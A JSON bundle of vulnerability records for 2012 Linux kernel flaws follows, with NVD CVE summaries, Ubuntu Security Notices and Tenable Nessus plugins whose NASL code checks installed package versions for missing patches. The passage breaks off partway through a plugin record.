{"cve": [{"lastseen": "2016-09-03T16:41:05", "bulletinFamily": "NVD", "description": "The copy_creds function in kernel/cred.c in the Linux kernel before 3.3.2 provides an invalid replacement session keyring to a child process, which allows local users to cause a denial of service (panic) via a crafted application that uses the fork system call.", "modified": "2013-04-18T23:22:22", "published": "2012-08-09T06:29:47", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2745", "id": "CVE-2012-2745", "title": "CVE-2012-2745", "type": "cve", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T16:50:03", "bulletinFamily": "NVD", "description": "The rds_recvmsg function in net/rds/recv.c in the Linux kernel before 3.0.44 does not initialize a certain structure member, which allows local users to obtain potentially sensitive information from kernel stack memory via a (1) recvfrom or (2) recvmsg system call on an RDS socket.", "modified": "2013-04-18T23:23:26", "published": "2012-10-03T07:02:56", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3430", "id": "CVE-2012-3430", "title": "CVE-2012-3430", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-03T16:49:48", "bulletinFamily": "NVD", "description": "The sfc (aka Solarflare Solarstorm) driver in the Linux kernel before 3.2.30 allows remote attackers to cause a denial of service (DMA descriptor consumption and network-controller outage) via crafted TCP packets that trigger a small MSS value.", "modified": "2013-08-17T02:46:41", "published": "2012-10-03T07:02:56", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3412", "id": "CVE-2012-3412", "title": "CVE-2012-3412", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T16:51:18", "bulletinFamily": "NVD", "description": "Multiple race conditions in the madvise_remove function in mm/madvise.c in the Linux kernel before 3.4.5 allow local users to cause a denial of service (use-after-free and system crash) via vectors involving a (1) munmap or (2) close system call.", "modified": "2013-10-23T23:40:07", "published": "2012-10-03T23:28:35", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3511", "id": "CVE-2012-3511", "type": "cve", "title": "CVE-2012-3511", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:00", "bulletinFamily": "unix", "description": "A flaw was found in how the Linux kernel passed the replacement session keyring to a child process. An unprivileged local user could exploit this flaw to cause a denial of service (panic). (CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel\u2019s memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "modified": "2012-09-19T00:00:00", "published": "2012-09-19T00:00:00", "id": "USN-1574-1", "href": "https://usn.ubuntu.com/1574-1/", "title": "Linux kernel (Natty backport) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:57", "bulletinFamily": "unix", "description": "A flaw was found in how the Linux kernel passed the replacement session keyring to a child process. An unprivileged local user could exploit this flaw to cause a denial of service (panic). (CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel\u2019s memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "modified": "2012-09-14T00:00:00", "published": "2012-09-14T00:00:00", "id": "USN-1567-1", "href": "https://usn.ubuntu.com/1567-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:23", "bulletinFamily": "unix", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel\u2019s memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "modified": "2012-09-19T00:00:00", "published": "2012-09-19T00:00:00", "id": "USN-1572-1", "href": "https://usn.ubuntu.com/1572-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:02", "bulletinFamily": "unix", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel\u2019s memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "modified": "2012-09-19T00:00:00", "published": "2012-09-19T00:00:00", "id": "USN-1573-1", "href": "https://usn.ubuntu.com/1573-1/", "title": "Linux kernel (EC2) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:21", "bulletinFamily": "unix", "description": "A flaw was discovered in the Linux kernel\u2019s KVM (kernel virtual machine). An administrative user in the guest OS could leverage this flaw to cause a denial of service in the host OS. (CVE-2012-2121)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel\u2019s memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "modified": "2012-09-21T00:00:00", "published": "2012-09-21T00:00:00", "id": "USN-1577-1", "href": "https://usn.ubuntu.com/1577-1/", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:24", "bulletinFamily": "unix", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)", "modified": "2012-09-19T00:00:00", "published": "2012-09-19T00:00:00", "id": "USN-1575-1", "href": "https://usn.ubuntu.com/1575-1/", "title": "Linux kernel (Oneiric backport) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:31", "bulletinFamily": "unix", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)", "modified": "2012-09-14T00:00:00", "published": "2012-09-14T00:00:00", "id": "USN-1568-1", "href": "https://usn.ubuntu.com/1568-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:20", "bulletinFamily": "unix", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)", "modified": "2012-09-21T00:00:00", "published": "2012-09-21T00:00:00", "id": "USN-1578-1", "href": "https://usn.ubuntu.com/1578-1/", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:58", "bulletinFamily": "unix", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nMathias Krause discovered an information leak in the Linux kernel\u2019s TUN/TAP device driver. A local user could exploit this flaw to examine part of the kernel\u2019s stack memory. (CVE-2012-6547)\n\nA flaw was discovered in the requeuing of futexes in the Linux kernel. A local user could exploit this flaw to cause a denial of service (system crash) or possibly have other unspecified impact. (CVE-2012-6647)\n\nA flaw was found in Linux kernel\u2019s validation of CIPSO (Common IP Security Option) options set from userspace. A local user that can set a socket\u2019s CIPSO options could exploit this flaw to cause a denial of service (crash the system). (CVE-2013-0310)", "modified": "2012-09-21T00:00:00", "published": "2012-09-21T00:00:00", "id": "USN-1580-1", "href": "https://usn.ubuntu.com/1580-1/", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:27", "bulletinFamily": "unix", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nMathias Krause discovered an information leak in the Linux kernel\u2019s TUN/TAP device driver. A local user could exploit this flaw to examine part of the kernel\u2019s stack memory. (CVE-2012-6547)\n\nA flaw was discovered in the requeuing of futexes in the Linux kernel. A local user could exploit this flaw to cause a denial of service (system crash) or possibly have other unspecified impact. (CVE-2012-6647)\n\nA flaw was found in Linux kernel\u2019s validation of CIPSO (Common IP Security Option) options set from userspace. A local user that can set a socket\u2019s CIPSO options could exploit this flaw to cause a denial of service (crash the system). (CVE-2013-0310)", "modified": "2012-09-21T00:00:00", "published": "2012-09-21T00:00:00", "id": "USN-1579-1", "href": "https://usn.ubuntu.com/1579-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:17:40", "bulletinFamily": "scanner", "description": "A flaw was found in how the Linux kernel passed the replacement session keyring to a child process. An unprivileged local user could exploit this flaw to cause a denial of service (panic).\n(CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-1574-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62211", "published": "2012-09-20T00:00:00", "title": "Ubuntu 10.04 LTS : linux-lts-backport-natty vulnerabilities (USN-1574-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1574-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62211);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/12/01 13:19:07\");\n\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_bugtraq_id(54365, 54702, 54763, 55151);\n script_xref(name:\"USN\", value:\"1574-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS : linux-lts-backport-natty vulnerabilities (USN-1574-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in how the Linux kernel passed the replacement\nsession keyring to a child process. An unprivileged local user could\nexploit this flaw to cause a denial of service (panic).\n(CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's\nmemory subsystem. An unprivileged local use could exploit the flaw to\ncause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1574-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.38-16-generic\", pkgver:\"2.6.38-16.67~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.38-16-generic-pae\", pkgver:\"2.6.38-16.67~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.38-16-server\", pkgver:\"2.6.38-16.67~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.38-16-virtual\", pkgver:\"2.6.38-16.67~lucid1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-2.6-generic / linux-image-2.6-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:39", "bulletinFamily": "scanner", "description": "A flaw was found in how the Linux kernel passed the replacement session keyring to a child process. An unprivileged local user could exploit this flaw to cause a denial of service (panic).\n(CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-1567-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62111", "published": "2012-09-15T00:00:00", "title": "Ubuntu 11.04 : linux vulnerabilities (USN-1567-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1567-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62111);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/12/01 13:19:07\");\n\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_bugtraq_id(54365, 54702, 54763, 55151);\n script_xref(name:\"USN\", value:\"1567-1\");\n\n script_name(english:\"Ubuntu 11.04 : linux vulnerabilities (USN-1567-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in how the Linux kernel passed the replacement\nsession keyring to a child process. An unprivileged local user could\nexploit this flaw to cause a denial of service (panic).\n(CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's\nmemory subsystem. An unprivileged local use could exploit the flaw to\ncause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1567-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(11\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 11.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-16-generic\", pkgver:\"2.6.38-16.67\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-16-generic-pae\", pkgver:\"2.6.38-16.67\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-16-server\", pkgver:\"2.6.38-16.67\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-16-versatile\", pkgver:\"2.6.38-16.67\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-16-virtual\", pkgver:\"2.6.38-16.67\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-2.6-generic / linux-image-2.6-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:40", "bulletinFamily": "scanner", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-1573-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62200", "published": "2012-09-19T00:00:00", "title": "Ubuntu 10.04 LTS : linux-ec2 vulnerabilities (USN-1573-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1573-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62200);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/12/01 13:19:07\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_xref(name:\"USN\", value:\"1573-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS : linux-ec2 vulnerabilities (USN-1573-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's\nmemory subsystem. An unprivileged local use could exploit the flaw to\ncause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1573-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-2.6-ec2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", 